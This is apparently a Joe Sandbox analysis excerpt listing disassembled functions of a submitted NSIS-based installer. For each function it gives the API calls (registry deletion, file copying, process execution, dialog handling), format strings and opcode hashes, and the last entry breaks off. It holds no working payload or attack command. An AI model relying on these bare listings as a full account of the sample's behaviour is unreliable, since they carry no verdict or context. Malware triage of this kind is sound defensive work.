                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                  • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                  • API String ID: 2014279497-3433828417
                                  • Opcode ID: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                  • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                  • Opcode Fuzzy Hash: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                  • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                  APIs
                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                  • GetMessagePos.USER32 ref: 00404871
                                  • ScreenToClient.USER32(?,?), ref: 00404889
                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: Message$Send$ClientScreen
                                  • String ID: f
                                  • API String ID: 41195575-1993550816
                                  • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                  • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                  • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                  • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                  APIs
                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                  • MulDiv.KERNEL32(00011E00,00000064,?), ref: 00403295
                                  • wsprintfW.USER32 ref: 004032A5
                                  • SetWindowTextW.USER32(?,?), ref: 004032B5
                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                  Strings
                                  • verifying installer: %d%%, xrefs: 0040329F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: Text$ItemTimerWindowwsprintf
                                  • String ID: verifying installer: %d%%
                                  • API String ID: 1451636040-82062127
                                  • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                  • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                  • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                  • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                  APIs
                                  • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                  • wsprintfW.USER32 ref: 00404457
                                  • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: ItemTextlstrlenwsprintf
                                  • String ID: %u.%u%s%s$@rD
                                  • API String ID: 3540041739-1813061909
                                  • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                  • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                  • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                  • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                  APIs
                                  • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                  • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                  • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                  • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: Char$Next$Prev
                                  • String ID: *?|<>/":
                                  • API String ID: 589700163-165019052
                                  • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                  • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                  • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                  • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                  • RegCloseKey.ADVAPI32(?), ref: 00401504
                                  • RegCloseKey.ADVAPI32(?), ref: 00401529
                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: Close$DeleteEnumOpen
                                  • String ID:
                                  • API String ID: 1912718029-0
                                  • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                  • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                  • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                  • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                  APIs
                                  • GetDlgItem.USER32(?), ref: 004020A3
                                  • GetClientRect.USER32(00000000,?), ref: 004020B0
                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                  • DeleteObject.GDI32(00000000), ref: 004020EE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                  • String ID:
                                  • API String ID: 1849352358-0
                                  • Opcode ID: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                  • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                  • Opcode Fuzzy Hash: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                  • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                  APIs
                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: MessageSend$Timeout
                                  • String ID: !
                                  • API String ID: 1777923405-2657877971
                                  • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                  • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                  • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                  • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                  APIs
                                    • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                  Strings
                                  • DeleteRegKey: "%s\%s", xrefs: 00402843
                                  • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                  • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                  • API String ID: 1697273262-1764544995
                                  • Opcode ID: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                  • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                  • Opcode Fuzzy Hash: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                  • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                  APIs
                                  • IsWindowVisible.USER32(?), ref: 00404902
                                  • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                    • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: Window$CallMessageProcSendVisible
                                  • String ID: $@rD
                                  • API String ID: 3748168415-881980237
                                  • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                  • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                  • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                  • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                  APIs
                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                    • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                    • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                  • lstrlenW.KERNEL32 ref: 004026B4
                                  • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                  • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                  • String ID: CopyFiles "%s"->"%s"
                                  • API String ID: 2577523808-3778932970
                                  • Opcode ID: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                  • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                  • Opcode Fuzzy Hash: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                  • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: lstrcatwsprintf
                                  • String ID: %02x%c$...
                                  • API String ID: 3065427908-1057055748
                                  • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                  • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                  • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                  • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                  APIs
                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: PrivateProfileStringWritelstrcpyn
                                  • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                                  • API String ID: 247603264-1827671502
                                  • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                  • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                  • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                  • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                  APIs
                                  • OleInitialize.OLE32(00000000), ref: 00405057
                                    • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                  • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                  • String ID: Section: "%s"$Skipping section: "%s"
                                  • API String ID: 2266616436-4211696005
                                  • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                  • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                  • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                  • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                  APIs
                                  • GetDC.USER32(?), ref: 00402100
                                  • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                  • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                    • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                  • String ID:
                                  • API String ID: 1599320355-0
                                  • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                  • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
